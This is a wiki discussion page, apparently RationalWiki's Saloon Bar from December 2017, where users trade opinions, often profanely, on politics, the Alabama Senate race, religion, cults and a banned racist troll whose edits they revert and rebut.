- As it is, I think Taiwan now is probably in a position to bargain, and within the next 10-15 years will have little choice. China isn't as interested in Taiwan as much as she is access to the Pacific. Taiwan may well be able to cut a deal for de-jure independence (perhaps retaining some symbolic gesture, ie. making the status quo official and permanent) in return for ceding control of the Pratas and Orchid Island groups. These would give China the strategic locations it's wants. The Pratas is undoubtedly the most strategically important spot in the South China Sea, whilst the Orchid/Green Islands would allow the PRC to have naval bases facing directly into the Pacific, without having to risk a diplomatically and militarily costly invasion of the Taiwanese main island. If I were in the PRCs shoes, this is definitely would I'd be angling toward, and if I were in the ROCs group, what I'd be preparing for and thinking about what sort of deal I wanted. TheEgyptian¿Dígame? 00:36, 10 December 2017 (UTC)
- The KMT were criticized by General Joseph Stilwell for being corrupt and ineffective, so their capacity to win was questionable, as well as for their capacity to form a non-corrupt government that would do anything to improve the lot of the peasants. Chiang Kai-shek essentially was the dictator of Taiwan until 1975, and was himself responsible directly or indirectly for millions of civilian deaths.[12] Bongolian (talk) 19:58, 10 December 2017 (UTC)
- I would say the KMT's hopes to reunify China probably died with Sun Yat-sen.) 22:00, 15 December 2017 (UTC)
Dumpster dive[edit]
This week's is internet (why do I even bother to post these here?) Bigs (talk) 03:56, 12 December 2017 (UTC)
- Cheerful company? GrammarCommie (talk) 04:01, 12 December 2017 (UTC)
- It gets more eyeballs. Bongolian (talk) 06:51, 12 December 2017 (UTC)
- Who has spare eyeballs in this economy? Radioactive afikomen Please ignore all my awful pre-2014 comments. 04:04, 13 December 2017 (UTC)
As 2017 draws to a close, let's reflect on the positives and negatives in the world[edit]
To make it clear: Not all of these are Rationalzombie's opinions, some have been added by others, I think this way of doing it is stupid personally. Christopher (talk) 18:29, 12 December 2017 (UTC)
Positive
- New mental health civil rights laws
- Zimbabwean dictator Mugabe removed from power
- Australia recognizes gender-neutral marriage
- Final defeat of ISIS in Iraq
- Defeat of the China-Canada free trade deal
- Continued net gain of jobs in the U.S.
- Detection of gravitational waves emitted by colliding neutron stars allowing for better understanding of the origins of heavier elements
- Synthesis of antibodies capable of targeting 99% of HIV strands
- Considerable progress in the investigation of Russian election meddling headed by Special Counsel Robert Mueller
- Fun toys:
- Commissioning of some vessels belonging to the latest variant of the Arleigh Burke-class Aegis-equipped guided missile destroyer and the aircraft carrier USS Gerald Ford (CVN-78), the lead ship of her class
- Launching of the HMS Audacious, an Astute-class nuclear-powered fleet submarine, and completion of the aircraft carrier HMS Queen Elizabeth (R08), the lead ship of her class (please cue
the opening theme of The Hunt for Red October"Heart of Oak")
- Commissioning of the JS Kaga, the second Izumo-class
aircraft carrierhelicopter-destroyer
- Nintendo Switch!!!!
- We are still here (and possibly more peaceful in a few places that weren't so at the beginning of the year)
- Despite predictions to the contrary, WWIII has not happened yet (so don't get too excited but prepare for war nonetheless)
- A planet nearby is revealed to be a strong candidate for hosting life as we know it (Ross 128b)
- Women accusers of sexual harassment and assault are named Times Persons of the Year
- A Democrat won the Senate race in Alabama
Negative
- Communist China expands Internet censorship
- Donald Trump Presidency
- North Korean ballistic missile tests
- Regional accreditation of Bob Jones University
- 2017 being potentially another extremely hot year on record
- Disastrous forest fires in California and British Columbia
- Devastating (category 5) hurricanes in the American South and Puerto Rico
- Horror in South Asia
- Bhudist church in Myanmar encourage and participate in aggressive and violent persecution of Muslim minority (Rohingya).
- Aung San Suu Kyi fails as a human being and betrays the dignity of the Nobel Peace prize by denying the undeniable ethnic cleansing of the Rohingya people.
- Pakistan government loses control to Islamic fanaticism
- Hindu fanaticism and terrorism rises in India
- Spanish prosecutors imprison Regional leaders for holding a vote
Grey
- American recognition of Jerusalem as the official capital of Israel
- The '#me too' movement, a 'feminist' moral panic over stale claims of sexual harassment that does more political damage to Democrats than Republicans
- Renegotiation of NAFTA underway
- US withdrawal from the TPP
Note- add your thoughts :) --Rationalzombie94 (talk) 14:23, 12 December 2017 (UTC)
- It seems to me that the negative aspects of this year outweigh the positive or even neutral aspects. Perhaps we should take this as motivation to do better next year? Although it would seem that we have nowhere left to go but up as it stands. GrammarCommie (talk) 14:31, 12 December 2017 (UTC)
- @Rationalzombie94 I hope you don't mind me editing the list directly. Nerd (talk) 15:37, 12 December 2017 (UTC)
- @GrammarCommie
Do better? Don't you dare spread the Red Virus globally!It is good to be able to distinguish between the things you can change and the things you cannot. As for the former, have the courage to make a positive difference. Nerd (talk) 16:30, 12 December 2017 (UTC)
- those positives seem largely 'meh' at best, being rather nebulous and jumping the gun somewhat. and the negatives - you think its only the states that got hammered by bad weather? AMassiveGay (talk) 16:01, 12 December 2017 (UTC)
- I agree and specifically the launching of more super-expensive military equipment in the US doesn't seem to facilitate any particular goal right now. ikanreed 🐐Bleat at me 16:59, 12 December 2017 (UTC)
- Move my additions here if you prefer. Anna Livia (talk) 17:19, 12 December 2017 (UTC)
Mugabe's out, but I'm pretty sure Zimbabwe is still a dictatorship. Christopher (talk) 17:29, 12 December 2017 (UTC)
Leaving the TPP is grey IMO. Bigs (talk) 18:09, 12 December 2017 (UTC)
The bad: The rise of effing lootboxes, sexual harassment crap (Me Too is potentially good but it sucks that Democrats are held to a higher standard than Repugnicans; Repubes can just shrug off that their senators are pedophiles while Al Franken did the right thing while the Democrats all oppose him), Roy Moore Roy Mooreing. The Confederate statue thing and the fallout of Charlottesville. Failed promise of infrastructure spending. Failed repeals of ACA and replacements being horrendous versions. Mass shooting in Vegas, being among the worst in history. My friend got diagnosed with leukemia and my paternal grandma is finally dead. :(
The good: Super Mario Odyssey!!!! My friend also eventually recovered from leukemia, thanks to chemotherapy. Also, most nations have signed the Paris Accord. Donald Trump wants to crack down on Scientology. Me being active, perhaps? --It's-a me, LeftyGreenMario!(Mod) 19:57, 12 December 2017 (UTC)
- if you think this year saw the rise of loot boxes, then you really havent been paying attention. AMassiveGay (talk) 21:51, 12 December 2017 (UTC)
- If I'm wrong, some explanation would be nice. I'm basing from Jim Sterling's conclusion that 2017 is the Year of the Loot Box. Doesn't mean lootboxes were invented this year, it's that game companies went crazy with them. --It's-a me, LeftyGreenMario!(Mod) 00:37, 14 December 2017 (UTC)
- ive personally found loot boxes a pretty shitty scam for more long just this past year. i dont have a youtuber to validate it though. the only difference now is the push back - surely a good thing? AMassiveGay (talk) 16:08, 14 December 2017 (UTC)
- Any sort of pushback is a good thing, it's just that I wish it happened sooner. There's also Star Wars Battlefront which was so serious, there were government investigations. Sadly, I don't think EA or any other "whale" rapers are going to be heavily punished as they should be. --It's-a me, LeftyGreenMario!(Mod) 23:19, 15 December 2017 (UTC)
On the bad, I'd add Cassini's end of mission (it was quite sad to lose her after thirteen years faithfully following its mission at Saturn), that terrorist attack at Barcelona, and... well, entropy keeps increasing. On the good, the last tablet I bought has so far lasted almost a year. Panzerfaust (talk) 23:27, 12 December 2017 (UTC)
The bad: 2017 was not the year of Linux on the desktop. :( Spriggina (tal) (framlög) @ 19:52, 14 December 2017 (UTC)
- The Good: Guardians of the Galaxy 2, Thor: Ragnarok, Worm 2: Ward
- The Bad: Spam, Atheist-led anti-intellectualism, Donald Trump, spam, Net Neutrality repealed, Supreme Court Justice Gorsuch, Pensacola cheers the idea that Trump is bringing about the Biblical apocalypse, spam, the GOP tax cut for the rich, Trump's constant appointment of people who want to undermine the agencies they now lead, TPP pullout, spam, FUBAR response in Puerto Rico, having to rely on Kim Jong-Un to be the reasonable one that doesn't start nuclear war over nothing, an end to Obama's cyberwarfare policies allowing North Korea to get missiles capable of reaching the United States, and spam.
- The Ugly: Mueller's investigation seems to be going well targeting the guy who never should have been elected in the first place, people resist the Alt-Right but only after it rises up and leads to multiple deaths, Roy Moore is defeated but just barely, the courts are trying to fight back against idiotic Muslim bans, Steve Bannon looking like what happens when you barf tofu. Women are coming forward about sexual assault and harassment now, but otherwise reasonable people are characterizing it as a Warlock Hunt- PsychoGecko (talk) 09:05, 15 December 2017 (UTC)
Bad
- On the Verge of nuclear war with North Korea, which is still causing me anxiety!! (albeit less anxiety right now as a result of watching Dr.Strangelove)
- My Paternal Grandfather dying and my first dog being euthanized.
- Doug Jones barely winning in Alabama.
- Destruction of Net Neutrality
- Aung San Suu Kyi denying the ethnic cleansing of the Rohingya. (Something which I will never forgive her for)
Good
- My trip to Japan, Germany, and Italy (Finally able to see the mosaics of Justinian and Theodora in Ravenna, being able to see Florence, and going to the summer palace of Frederick II of Prussia)
- Graduating from College with a Bachelor of Sciences
- Release of the new Pokemon game
S.H. DeLong (talk) 07:18, 22 December 2017 (UTC)
Doug Jones wins Alabama special senate election[edit]
In a crazy turn of events, Doug Jones, the Democratic candidate, has won the Alabama special election (well, not officially, but it's all but guaranteed at this point)! Following a night of twists and turns, Roy Moore supporters are now singing Amazing Grace repeatedly at the headquarters and Democrats everywhere are gloating. What are your thoughts on this? Spriggina (tal) (framlög) @ 04:14, 13 December 2017 (UTC)
- I'm pretty fucking pleased. This might encourage other Democrats to campaign in other states previously thought untouchable for once. RoninMacbeth (talk) 04:32, 13 December 2017 (UTC)
- I honestly think the only reason he won was that Moore is a pedo. If he had all the same policy positions but wasn't a pedophile, I think he would've won. So this may not encourage Dems that much unless there's another Republican candidate accused of raping underage people in one of those states. Spriggina (tal) (framlög) @ 04:43, 13 December 2017 (UTC)
- YAS!!! Bigs (talk) 04:46, 13 December 2017 (UTC)
- It's about bloody arse time Alabama voters turned against that childfucking pervert!! GrammarCommie (talk) 04:55, 13 December 2017 (UTC)
- Pretty sad that Doug only barely won and it's not Roy Moore's overall being a piece of unconstitutional Bible thumping fermented gorilla acne pus, but a complete extreme low that is underage sexual harassment that made people get the message. --It's-a me, LeftyGreenMario!(Mod) 06:44, 13 December 2017 (UTC)
- I would have to agree with LynnR on this one. The only reason Jones won this Senate seat is because Moore is a child rapist and they were not able to get that Luther Strange guy in as the Republican candidate in the primary. Had Strange won the primary, things would've much different tonight.S.H. DeLong (talk) 06:53, 13 December 2017 (UTC)
- People are doing the math on Strange vs. Moore, and it doesn't look good for Steve Bannon, so there's more good news there as well. The downside is that we now have the data point that there are 650,436 Alabamians who would vote for literally anyone so long as they have an 'R' next to their name. Semipenultimate (talk) 16:33, 13 December 2017 (UTC)
- I don't think I've ever seen a better description of Roy Moore than fermented gorilla acne pus. Spriggina (tal) (framlög) @ 18:55, 13 December 2017 (UTC)
- Calling him "Roy Moore" would've been a verbal hit under the belt for him. I'm being nice. --It's-a me, LeftyGreenMario!(Mod) 00:39, 14 December 2017 (UTC)
- @S.H DeLong: The margins reveal very ugly implications, but I still count it as a major win. The closer the election got the more I assumed the worst, and now I'm incredibly happy to be proven wrong. 98.110.112.28 (talk) 06:42, 14 December 2017 (UTC)
- Not normally a huge fan of the Democratic Party, but I am happy with Moore losing (and I live in Michigan for Goddess sake!) --Rationalzombie94 (talk) 15:41, 13 December 2017 (UTC)
- Chrimbus Miracle. Oolon Colluphid (talk) 01:29, 14 December 2017 (UTC)
- It probably helps Democrat momentum for 2018 because in the somewhat competitive states they can tell voters look, we took Alabama, but people had to *show up* for that to happen, so you need to actually go vote, not just think it's a good idea. Getting your base motivated to show up for off-year elections is hard, obviously being wall-to-wall on the national news helps (between seeing Crimson Tide and summer 2017 I never heard the phrase "Roll Tide" once, then I heard it six times in the past few weeks on US national broadcasters) but a success like this helps too. Tialaramex (talk) 23:25, 14 December 2017 (UTC)
Founded some pretty Biased looking video from some Aussie Called "Suit Yourself"[edit]
ShiningSwordofThoughts (talk)
- So far All I can find is a Yahoo article : ShiningSwordofThoughts (talk) 05:00, 14 December 2017 (UTC)
User GrammarCommie reverting without discussion[edit]
[13] Is Rationalwiki his personal blog of favorite stories? Wangmeister (talk) 16:12, 14 December 2017 (UTC)
- Yes it is, there's the story about the three bears, the story about the gingerbread house and one of my personal favorites, the story about the mermaid. GrammarCommie (talk) 16:21, 14 December 2017 (UTC)
- Now in all seriousness I reverted your edit because A) it contained racist nonsense and B) you outright said to revert it in your edit summery. GrammarCommie (talk) 16:32, 14 December 2017 (UTC)
- This is a scientific method of establishing whether races are equal, and you reverted it, because you feel races are equal? "Revert away" was a joke. Knowing that, will you revert back? Or just looking for cheap excuses to hide facts that conflict with your politics and feelings? What can "racist" possibly mean in this context? Not pretending races are equal in the face of evidence? Why is it "nonsense"? You need to explain. Wangmeister (talk) 16:51, 14 December 2017 (UTC)
- Wangmeister is an admin from the Neo-Nazi site Rightpedia, Mikemikev - who has been banned from this site hundreds of times. He was blocked here yesterday on multiple socks for spamming defamatory Rightpedia articles he's now creating on other RationalWiki users.Tuna (talk) 17:00, 14 December 2017 (UTC)
- Once again, I find the people who constantly dox this person and follow them around more bizzrely obsessive than the self-deluded racist idiot themself. ikanreed 🐐Bleat at me 17:04, 14 December 2017 (UTC)
- Except we aren't following him - he stalks RW sysops now writing smear articles on them at Rightpedia. He chooses to come here and troll us; I've never once joined his Nazi wiki to engage him. He's obsessed with us, not the other way around. None of us ever go to his wiki, yet he's always here on dozens new accounts each month. The problem is since he's signing up with new accounts, people don't realise its all the same deranged person. "Doxing" is also personal information; posting his online pseudonym (Mikemikev) isn't doxing especially not since he signed up here with that name.Tuna (talk) 17:16, 14 December 2017 (UTC)
- I guess I realize innately that I don't consider it banworthy doxxing, but it's still basically about identifying an individual as a way to strike at them? If I saw someone pulling a similar thing for another user, and going "aha, you're user X on reddit or wikipedia"(where x is not the same name), i'd be a bit concerned?
- To immediately an accurately identify the specific person and to consistently respond in a similar way is still a bit odd in a way that reads to me as obsessive. It troubles me. Socks are a thing and identifying them is fine, but it feels like an "actively monitoring" situation. ikanreed 🐐Bleat at me 17:35, 14 December 2017 (UTC)
- I don't think it qualifies as doxxing. It's more of a heads-up for a low-quality user who is sneaky and goes by pseudonyms. I don't know if this is even called stalking if it's what you call "obsessive", but information like this at least saves us trouble to respond where we'd otherwise assume good faith and waste time with Mikemikev. Now, it's another case to keep responding in a similar way every time mikemikev comes up, maybe next time, just notify a sysop or a mod's page or do it on our Discord. Post a rebuttal if you must, but maybe you won't scare ikanreed as much. --It's-a me, LeftyGreenMario!(Mod) 19:44, 14 December 2017 (UTC)
ikanreed has just enough time to follow your cites[edit]
Just look at what that edit was wearing, it was asking for it.
No really, citing the website of a prolific racist, and citing papers that A. Don't even exist at the given url, or B. don't even remotely support the egregiously racist sentence preceding them? And then whining when that incredibly shitty edit gets reverted? Fuck off, you're not oppressed, you're full of shit.
You didn't fucking read the goddamn abstract of that plos one paper, why the fuck should we waste time to read the positively useless bilge you generate in your deluded goddamn mind? Like... good job thinking that a paper that briefly touches on socioeconomic status only to assert the opposite of the idea you managed to extract from it, supports a hereditary hypothesis of capability being primarily determinative of status, you goddamn fucking imbecile, you lunatic, you illterate fucking waste of everyone's time. ikanreed 🐐Bleat at me 17:04, 14 December 2017 (UTC)
- "You are racist" or "He is racist" isn't an argument. Give examples of missing papers. I've read the entire Steve Hsu compressed sensing paper. Also his more recent application to heritability of height. Why are you slandering me? It's a general method for GWAS. Can be used for any GWAS. They posit a Donoho-Tanner phase transition. You didn't understand that? Wangmeister (talk) 17:10, 14 December 2017 (UTC)
- (I know they're blocked) You are a racist, and you are pointedly ignoring the content of "you clearly didn't even fucking read your own cites with any sort of comprehension" to be offended at that non-trivial point. Citing an unabashed piece of shit isn't gonna win you any debates, and nor is then crying ad hominem when their history of intellectual dishonesty and vile beliefs are pointed out. It may be a logical fallacy, but it's also a damn good reason to not treat them as authoritative. ikanreed 🐐Bleat at me 17:35, 14 December 2017 (UTC)
- If someone is an admin for a Neo-Nazi site, then yes, the guy is a racist. --Rationalzombie94 (talk) 13:11, 15 December 2017 (UTC)
- Sure. But saying "you are racist" or "that's racist" isn't a counterargument. It's just mindless name calling. 86.187.115.177 (talk) 16:31, 15 December 2017 (UTC)
- Pretty sure the relevance to their credibility as a citable source is obvious, so instead of replying to you in a meaningful way: fuck you, and fuck your ideology, and fuck your willful ignorance. ikanreed 🐐Bleat at me 17:23, 15 December 2017 (UTC)
- To the racist OP- Not matter how much logic and reason we were to give you, it is not like you would listen anyway. No point. The best way to combat racism is educating people that being different is okay, gays are not evil and teach people proper science. --Rationalzombie94 (talk) 19:19, 15 December 2017 (UTC)
Is trinitarian Christianity polytheist?[edit]
I would say it is as it has three deities, even with the three-in-one package., 15 December 2017 (UTC)
- No. God the Father, God the Son, and God the Holy Spirit are one God. It's a mystery, meaning that you get trapped in a Borgesian labyrinth if you try to figure it out; best to just accept it and move on. I don't have issues with the Trinity, but I do think that the Greek idealistic metaphysics some resorted to as an explanation are 'problematic'. We're told that the Father, Son, and Holy Ghost are concurrently one God because they share a single 'substance' or 'essence' of God. To me, this raises the possibility of an abstract, inanimate Deity. - Smerdis of Tlön, LOAD "*", 8, 1. 02:48, 15 December 2017 (UTC)
- I would say what makes the most sense out of the possibilities is this. The Father and Holy Spirit are not separate beings, they are just God. Jesus was not the literal son of God, but a prophet.:05, 15 December 2017 (UTC)
- If they are to be accepted as separate, then yes. But what I find is that people claim they are separate yet still one. And though this makes no sense (see Trinity#Some attempts at formal logic), they can claim it's beyond our comprehension or mysterious, without any proper justification of how or why. —Kazitor, pending 07:53, 15 December 2017 (UTC)
- It is actually another example of 'ancient science' - the deity version of this. Anna Livia (talk) 10:57, 15 December 2017 (UTC)
- It totes is, but theologians are certain it isn't. ikanreed 🐐Bleat at me 16:19, 15 December 2017 (UTC)
- I don't think mainstream trinitarian Christianity is, as Jesus, God, and the Holy Spirit are technically one being, but in Mormonism they are actually separate, making it polytheist. Spriggina (tal) (framlög) @ 16:24, 15 December 2017 (UTC)
Christianity is as polytheistic as that classic example of polytheism - Hinduism - in that all the Hindu gods are considered to be aspects the one Ultimate Brahman. My impression is that polytheistic religions in general work like this. So it probably does not make a lot of difference.Bob"Life is short and (insert adjective)" 12:13, 17 December 2017 (UTC)
Rationalwiki on Twitter[edit]
Why does everyone think it's a joke? Is it some kind of self selecting sample bias? 86.187.115.177 (talk) 16:34, 15 December 2017 (UTC)
You guys need to get on twitter and explain this one. I'm sure you have a good explanation and can explain this when you can't ban your opponent. Rationalwiki! 86.187.115.177 (talk) 16:46, 15 December 2017 (UTC)
- By "everyone" you mean a small number of creationists, spiritualists, neo-nazis and other cranks. All these people hate rationalwiki because it criticises their crazy beliefs. One of the people moaning at RW on Twitter in the last few hours on that link you posted is the pseudo-science promoter and troll Rome Viharo. You need to explain why you think anyone takes internet crazies like this seriously; their opinion on RationalWiki is worthless.Dr. Witt (talk) 16:56, 15 December 2017 (UTC)
- No, it's literally everyone that mentions it, laughing at it. Also check the new tweet after your comment above. Who are they talking about? 86.187.115.177 (talk) 17:01, 15 December 2017 (UTC)
- Argumentum ad populum:07, 15 December 2017 (UTC)
- Yawn. GrammarCommie (talk) 17:11, 15 December 2017 (UTC)
- I don't know about everyone else here, but I'm truly shocked to find there are people on Twitter who don't appreciate the site. Its deeply and profoundly disturbing. What on earth can we do? I mean, we can't just ignore then, can we?Bob"Life is short and (insert adjective)" 18:34, 15 December 2017 (UTC)
- Nah, that would imply that random twitter users' opinions of us don't matter in the slightest. And we can't have that now can we? GrammarCommie (talk) 18:40, 15 December 2017 (UTC)
- If everyone on twitter that mentions you thinks you're a joke, you're a joke. Carry on! 62.30.229.198 (talk) 18:45, 15 December 2017 (UTC)
- I'm reffering to the video ShiningSwordofThoughts (talk) 18:42, 15 December 2017 (UTC)
Aside: people who have something to say against RW are more likely to voice their opinion. Imagine if everyone commented on every slight thing they didn't hate. No thanks. —Kazitor, pending 00:21, 16 December 2017 (UTC)
Let's do science[edit]
I randomly sampled(incremental monte carlo progressive samping with max(N) being 8, disregarding the @RationalWiki account and posts not directly referencing the site) 15 of the searched. And based on the first one, I decided to examine their twitter bios and avatars for signs of being literally goddamn nazis as supplemental information, as I conjectured these people would be particularly inclined to object to us.
- . Literal goddamn Nazi, Negative
- . Literal Goddamn nazi, very Negative
- . Not nazi, Extremely positive
- . Literal goddamn nazi, very negative
- . Not nazi, Nuetral,
- . Not nazi, Neutral, seems irrelvant to mention rational wiki, talking about disney?
- . Not a nazi, exact quote: "rationalwiki is a good resource"
- . Not a nazi, negative(worth noting though they were saying we target flat earthers to mock "legitimate conspiracy theories")
- . Not a nazi, neutral:
- . Anime nazi: very negative
- . Not a nazi, Neutral? Negative? mentioning us at the end for no reason? (I can't tell if their opinion of us in the context of the tweet, but it says that the government is secretly holding the cancer cure and free energy)
- . "No, I'm not a nazi" is literally in their twitter bio, but I think they probably are? Decide for yourself, negative
- . "Odinist"(Actual nazi, not satiric religion): negative, but by comparing us to NYTimes and wikipedia
- . Not a nazi, positive/silly
- . Not a nazi, negative(gamergater, but considering I didn't specify that being relevant prior to the experiment it feels like an ad-hoc justification and should not be discounted)
Short version, 2 negative posts by non nazis in this random sample.
Also this IP is probably the one who's been filling the search results with the same 2-3 posts over and over again for the past week to justify their own post when they made it here? ikanreed 🐐Bleat at me 19:43, 15 December 2017 (UTC)
- I'd just like to add that we are well aware of people disagreeing with us. Nothing new there. —Kazitor, pending 22:57, 15 December 2017 (UTC)
Irony[edit]
Does anyone else find it ironic that in spite of our criticism of libertarianism, we function as a night watchman:09, 15 December 2017 (UTC)
- Not really. A night watchman state can't really work for large, modern nation states in the post-Westphalia sense. Online wikis aren't that, so it's better to have a night watchman state as a model for how we function as a website. RoninMacbeth (talk) 19:00, 15 December 2017 (UTC)
- Except that that's not at all true? We even have an elected board who allocates funds and does shit you're not paying attention to to keep the wiki going? And we have rules about moderation that do not really reflect libertarian ideals? And there really isn't a commons to regulate for a wiki the way there is for a society(i.e. pollution controls or worker safety). And the only money that changes hands here is donations to the wiki, so financial fraud, and other kinds of systemic abuse aren't topical? In fact, this assertion feels so contrived I cannot even imagine the train of "thought" that might have prompted posting it. ikanreed 🐐Bleat at me 19:08, 15 December 2017 (UTC)
- Wot? Spriggina (tal) (framlög) @ 19:28, 15 December 2017 (UTC)
- That comment I made was like 90% a joke., 15 December 2017 (UTC)
Do Neo-Nazis have anything better to do than trolling Rationalwiki?[edit]
It is not like they can come up with any logical or sensible conversation. Are Nazis (There! I fixed it! Yay!) afraid of us Rationalwikians educating people? Then again, education is the worst enemy of a brainless racist. Watch the Nazi trolls say a bunch of mindless shit. --Rationalzombie94 (talk) 23:59, 15 December 2017 (UTC)
- *dies over the usage of an apostrophe without a possessive nor contraction* —Kazitor, pending 00:17, 16 December 2017 (UTC)
- In the name of the glorious Grammatical Revolution fix that apostrophe!!! GrammarCommie (talk) 00:20, 16 December 2017 (UTC)
- Fixed it, and internet loonies tend to spend their time trolling.) 00:28, 16 December 2017 (UTC)
- I admit, not the biggest grammar champion. I am more of a science guy. No offense taken. When I went to make this thread, my computer battery died. Anyways, on the main topic, it is safe to say that education is the worst enemy of racists. --Rationalzombie94 (talk) 01:46, 16 December 2017 (UTC)
- RZ - in your initial post do you have an example of this? Anna Livia (talk) 21:21, 16 December 2017 (UTC)
- I don't see any reason to care about Neo-Nazis or overall racists, particularly those that troll RationalWiki with edits that are easily reverted and ignored. You answered your own question: they're allergic to decency and intelligence, so they have nothing better to do. No further discussion. --It's-a me, LeftyGreenMario!(Mod) 02:19, 17 December 2017 (UTC)
say no to drugs[edit]
i was at a... lets say party. i am virtually blind without specs and some activities i generally do without. it was not until after that noticed the nazi eagle tattooed on his chest. when questioned, in the hope it was a regretfully permanent mistake, the answer i receivee was 'it was a tribute to a loved one'. he was not too coherant and i was a little too high to press the issue. so yeah, i might have accidently fucked a nazi AMassiveGay (talk) 02:16, 16 December 2017 (UTC)
- AMG, when we say "fuck nazis" we don't mean literally fuck Nazis!! GrammarCommie (talk) 02:21,:37, 16 December 2017 (UTC)
- It happens, no judgment. At least Nazi got fucked by a liberal --Rationalzombie94 (talk) 12:30, 16 December 2017 (UTC)
- Maybe it was a Hindu swastika, tattooed on because of his firm Hindu beliefs. 32℉uzzy; 0℃atPotato (talk/stalk) 20:02, 16 December 2017 (UTC)
- That didn't sound like Garuda! Bongolian (talk) 21:16, 16 December 2017 (UTC)
- @AMassiveGay Please stay safe! Nerd (talk) 17:53, 19 December 2017 (UTC)
- @LeftyGreenMario Freedom of speech and expression is a two-way street. Expect people to disagree with you. Their right to express themselves implies your right to choose whether or not to listen. If they want to become ideological idiots, let them do it, as long as they are not committing acts of violence, of course. Nerd (talk) 17:53, 19 December 2017 (UTC)
- I'm not for censorship, but it's another thing when I'm on a college campus, and there is a guy with a megaphone spouting off how slutty women are and making racist or LGBT slurs. College campuses also have the right whenever to host this kind of stuff or not. That's also freedom of speech, and if they don't want to endorse it, then they have the right not to. --It's-a me, LeftyGreenMario!(Mod) 19:25, 19 December 2017 (UTC)
- @LeftyGreenMario Personally I could not care less, as long as they are sprouting their nonsense at the designated time and space. (One should not tolerate disruptions in the lecture halls, libraries, or dorms.) It is a fine legal tradition dating back to the Roman Empire that people ought to be punished only for their actions, not thoughts. And we are talking about people expressing their thoughts here. Freedom of speech and expression is a wonderful thing. Of course, when they are slandering, libeling, or lying to the police, that's a different story. Nerd (talk) 15:20, 22 December 2017 (UTC)
- @Nerd You couldn't care less, but people react differently to different things. You'll still be affected at some level even if you say you don't care. But some people can't build psychological barriers like that, they just aren't good at it. That's how we get the definition of "toxic people" and "toxic" in general. Campuses don't want a toxic atmosphere, understandably so since this sort of speech hurts people too even if not physical, and they also have their freedom to express their policy and thoughts too. AND they're the ones providing the platform too, so they should have that power to set limits. Besides, no one is arresting anti-abortion picketers who carry graphic imagery of bloody babies and heckling students, campus security just shows them the door. I mean, they're free to put signs on the street as long as they're law-abiding, but once they hit property of Planned Parenthood or a college campus, their absolute free speech rights end. --It's-a me, LeftyGreenMario!(Mod) 03:10, 23 December 2017 (UTC)
What's the Appeal of Cults?[edit]
I'm just wondering what gets people caught up in this and makes them buy into the whole song and dance. I read that some things they say are like "we are all just individual points, converging on infinity. Here on earth for a short time, need to make room for new life. Those that fight hardest against death are those most tempted by its salvation." Or how death is not the end, it's just a door and the final step is rebirth and immortality. What makes people not use logic here?Machina (talk) 04:39, 17 December 2017 (UTC)
- Humans are a social species. We want to be accepted, and we'll often grab at the first thing we find. Cults create a sense of purpose. A sense of community. Another thing is, we hate feeling insignificant. They also provide that, saying that we're part of something bigger. And finally, the isolation manages to keep them from considering alternatives.:58, 17 December 2017 (UTC)
- But wouldn't saying we are just "points converging on infinity" more like trying to say our issues and problems are insignificant? Wouldn't that be the opposite of a "cult"?Machina (talk) 03:07, 19 December 2017 (UTC)
- There's also the fact that cults tend to be social lobster traps, easy to join but hard to leave. Whether that's the manipulations of Scientology or the fences of the Waco ranch. GrammarCommie (talk) 05:03, 17 December 2017 (UTC)
- There is probably something of a continuum - with 'fan clubs and other groups' being the (mostly) reasonable equivalent.
- How do cults and conspiracy theories inter-relate/compare and contrast? Anna Livia (talk) 10:55, 17 December 2017 (UTC)
- Add to that the feeling of desperation and finding someone that will help you -as these-, who are present here changing their name from time to time. Panzerfaust (talk) 11:03, 17 December 2017 (UTC)
- You might just as well ask "What is the appeal of religion?"Bob"Life is short and (insert adjective)" 12:06, 17 December 2017 (UTC)
- There are hobbies, faiths, fandoms (including sports clubs) etc and there are cults. Some people will get involved in their 'pet interest' to an excessive degree - and some people may find that belonging to a cult (or a cult-like set up) satisfies a psychological need that cannot otherwise be satisfied or resolved. Possibly the distinction is between whether 'the interest' is central and all encompassing or peripheral/something that is there in the background (and you can have a conversation which does not include the particular topic). Anna Livia (talk) 20:51, 17 December 2017 (UTC)
What's the appeal of (specific) religions?[edit]
Much to the chagrin of some anti-theists here I'm not going to posit that major religions are cults. But the core appeals of both are the same: spiritual fulfillment, promises of a better life/afterlife, social acceptance, purpose, peace, and love. Most people have some affinity for religion, whether innately or learned, and cults tend to be masters of appealing to the most downtrodden in a way that a "big" religion may not be. ikanreed 🐐Bleat at me 18:30, 18 December 2017 (UTC)
Further Reading[edit]
- Cult membership: What factors contribute to joining or leaving?
- This Is How Cults Work
- The Cult Education Institute
And everyone reading this should remember: We are all vulnerable to being brainwashed into a cult, so here is a cult checklist just in case. Give it a read.
@Machina —ClickerClock (talk) 12:11, 23 December 2017 (UTC)
thealternativehypothesis.org we need an article and some serious refuting.[edit]
I am sorry if this is the wrong place, but I am both green here, and also have been away after the forums where closed, so I don't know where to talk or get help.
The site seems to be trying to be more passive in its messages, but it still has that "racial realist" feel to it.
I am just wondering how we can refute their more ridiculous articles; like the one on "Race Mixing". — Unsigned, by: Zavvnao / talk / contribs
- Go for it dude. I think some of my brain cells rotted reading that pseudoscience garbage. --Rationalzombie94 (talk) 14:44, 18 December 2017 (UTC)
- I will be more than willing to proofread any article you come up with @Zavvnao. GrammarCommie (talk) 14:48, 18 December 2017 (UTC)
- Small question: are they notable? Who cites them? How much? If we covered every single shitty website with an article we'd never run out. ikanreed 🐐Bleat at me 17:35, 18 December 2017 (UTC)
- since the op mentioned 'race mixing', we already have an article on miscegnation. im not sure sure we would need to refute this people speciically, notable or not. AMassiveGay (talk) 17:46, 18 December 2017 (UTC)
- Wow WOW. Sounds like John Fuerst. Create an article called The Alternative Hypothesis. While race mixing has been refuted, this doesn't stop us from creating an article fot the entire site. It even mentions Kirkegaard in an article.—Hamburguesa con queso con un cara (talk • stalk) 18:11, 18 December 2017 (UTC)
- There's already an article on the Alternative Hypothesis: Ryan Faulk (that's his real name). What's funny is I knew him over 10 years ago on YoutTube. Back then he was not a racist, but did videos on market economics and was an anarcho-libertarian or something similar. Overtime though he got radicalises and is now a hardcore alt-righter, anti-Semite etc. Dr. Witt (talk) 21:56, 18 December 2017 (UTC)
- I'm sure you guys can refute Ryan easily. This is going to be very embarrassing for him. Good luck! Dark Ages Heretic (talk) 10:40, 19 December 2017 (UTC)
Sorry, I went to post on alternative hypothesis[edit]
Somehow my computer screwed up --Rationalzombie94 (talk) 16:24, 19 December 2017 (UTC)
